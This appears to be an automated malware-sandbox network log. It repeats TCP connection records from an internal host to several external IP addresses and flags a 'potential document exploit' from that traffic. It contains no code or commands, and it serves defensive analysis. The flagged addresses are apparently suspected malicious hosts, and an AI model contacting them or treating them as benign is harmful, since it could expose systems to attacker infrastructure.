Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic	TCP traffic: 38.242.255.115:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic	TCP traffic: 38.242.255.115:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 38.242.255.115:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
